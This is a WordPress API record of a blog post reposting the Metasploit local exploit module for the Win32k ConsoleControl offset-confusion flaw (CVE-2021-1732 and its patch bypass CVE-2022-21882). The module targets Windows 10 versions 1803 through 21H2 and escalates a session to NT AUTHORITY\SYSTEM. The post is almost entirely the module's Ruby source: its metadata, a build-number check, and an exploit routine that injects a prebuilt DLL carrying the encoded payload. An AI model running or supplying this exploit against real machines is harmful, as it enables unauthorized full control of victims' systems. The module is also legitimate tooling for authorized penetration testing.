{"id":21119,"date":"2022-02-28T20:18:22","date_gmt":"2022-02-28T17:18:22","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166169\/cve_2022_21882_win32k.rb.txt"},"modified":"2022-03-02T12:34:35","modified_gmt":"2022-03-02T09:04:35","slug":"win32k-consolecontrol-offset-confusion-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/win32k-consolecontrol-offset-confusion-privilege-escalation\/","title":{"rendered":"Win32k ConsoleControl Offset Confusion \/ Privilege Escalation"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Local
\nRank = AverageRanking<\/p>\n

include Msf::Post::File
\ninclude Msf::Post::Windows::Priv
\ninclude Msf::Post::Windows::Process
\ninclude Msf::Post::Windows::ReflectiveDLLInjection
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n

include Msf::Exploit::Deprecated
\nmoved_from ‘exploit\/windows\/local\/cve_2021_1732_win32k’<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n{
\n‘Name’ => ‘Win32k ConsoleControl Offset Confusion’,
\n‘Description’ => %q{
\nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
\nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
\ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
\nachieve an out of bounds write operation, eventually leading to privilege escalation.<\/p>\n

This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
\nIn early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
\nis the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
\nfunction on a wider range of Windows 10 targets.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n# CVE-2021-1732
\n‘BITTER APT’, # exploit as used in the wild
\n‘JinQuan’, # detailed analysis
\n‘MaDongZe’, # detailed analysis
\n‘TuXiaoYi’, # detailed analysis
\n‘LiHao’, # detailed analysis
\n# CVE-2022-21882
\n‘L4ys’, # github poc
\n# both CVEs
\n‘KaLendsi’, # github pocs
\n# Metasploit exploit
\n‘Spencer McIntyre’ # metasploit module
\n],
\n‘Arch’ => [ ARCH_X64 ],
\n‘Platform’ => ‘win’,
\n‘SessionTypes’ => [ ‘meterpreter’ ],
\n‘DefaultOptions’ => {
\n‘EXITFUNC’ => ‘thread’
\n},
\n‘Targets’ => [
\n[ ‘Windows 10 v1803-21H2 x64’, { ‘Arch’ => ARCH_X64 } ]\n],
\n‘Payload’ => {
\n‘DisableNops’ => true
\n},
\n‘References’ => [
\n# CVE-2021-1732 references
\n[ ‘CVE’, ‘2021-1732’ ],
\n[ ‘URL’, ‘https:\/\/ti.dbappsecurity.com.cn\/blog\/index.php\/2021\/02\/10\/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack\/’ ],
\n[ ‘URL’, ‘https:\/\/github.com\/KaLendsi\/CVE-2021-1732-Exploit’ ],
\n[ ‘URL’, ‘https:\/\/attackerkb.com\/assessments\/1a332300-7ded-419b-b717-9bf03ca2a14e’ ],
\n[ ‘URL’, ‘https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-1732’ ],
\n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
\n[ ‘URL’, ‘https:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/22.html’ ],
\n[ ‘URL’, ‘https:\/\/www.geoffchappell.com\/studies\/windows\/win32\/user32\/structs\/wnd\/index.htm’ ],
\n[ ‘URL’, ‘https:\/\/byteraptors.github.io\/windows\/exploitation\/2020\/06\/03\/exploitingcve2019-1458.html’ ],
\n[ ‘URL’, ‘https:\/\/www.trendmicro.com\/en_us\/research\/16\/l\/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html’ ],
\n# CVE-2022-21882 references
\n[ ‘CVE’, ‘2022-21882’ ],
\n[ ‘URL’, ‘https:\/\/github.com\/L4ys\/CVE-2022-21882’ ],
\n[ ‘URL’, ‘https:\/\/github.com\/KaLendsi\/CVE-2022-21882’ ]\n],
\n‘DisclosureDate’ => ‘2021-02-09’, # CVE-2021-1732 disclosure date
\n‘DefaultTarget’ => 0,
\n‘Notes’ => {
\n‘Stability’ => [ CRASH_OS_RESTARTS, ],
\n‘Reliability’ => [ REPEATABLE_SESSION, ],
\n‘SideEffects’ => []\n}
\n}
\n)
\n)
\nend<\/p>\n

def check
\nsysinfo_value = sysinfo[‘OS’]\n

if sysinfo_value !~ \/windows\/i
\n# Non-Windows systems are definitely not affected.
\nreturn Exploit::CheckCode::Safe
\nend<\/p>\n

build_num = sysinfo_value.match(\/\\w+\\d+\\w+(\\d+)\/)[0].to_i
\nvprint_status(“Windows Build Number = #{build_num}”)<\/p>\n

unless sysinfo_value =~ \/10\/ && (build_num >= 17134 && build_num <= 19044)
\nprint_error(‘The exploit only supports Windows 10 versions 1803 – 21H2’)
\nreturn CheckCode::Safe
\nend<\/p>\n

CheckCode::Appears
\nend<\/p>\n

def exploit
\nif is_system?
\nfail_with(Failure::None, ‘Session is already elevated’)
\nend<\/p>\n

if sysinfo[‘Architecture’] == ARCH_X64 && session.arch == ARCH_X86
\nfail_with(Failure::NoTarget, ‘Running against WOW64 is not supported’)
\nelsif sysinfo[‘Architecture’] == ARCH_X64 && target.arch.first == ARCH_X86
\nfail_with(Failure::NoTarget, ‘Session host is x64, but the target is specified as x86’)
\nelsif sysinfo[‘Architecture’] == ARCH_X86 && target.arch.first == ARCH_X64
\nfail_with(Failure::NoTarget, ‘Session host is x86, but the target is specified as x64’)
\nend<\/p>\n

encoded_payload = payload.encoded
\nexecute_dll(
\n::File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2022-21882’, ‘CVE-2022-21882.x64.dll’),
\n[encoded_payload.length].pack(‘I<‘) + encoded_payload
\n)<\/p>\n

print_good(‘Exploit finished, wait for (hopefully privileged) payload execution to complete.’)
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Deprecated moved_from ‘exploit\/windows\/local\/cve_2021_1732_win32k’ def initialize(info = {}) super( update_info( info, { ‘Name’ => ‘Win32k ConsoleControl Offset Confusion’, ‘Description’ => %q{ A vulnerability exists within win32k …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21119","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21119"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21119\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}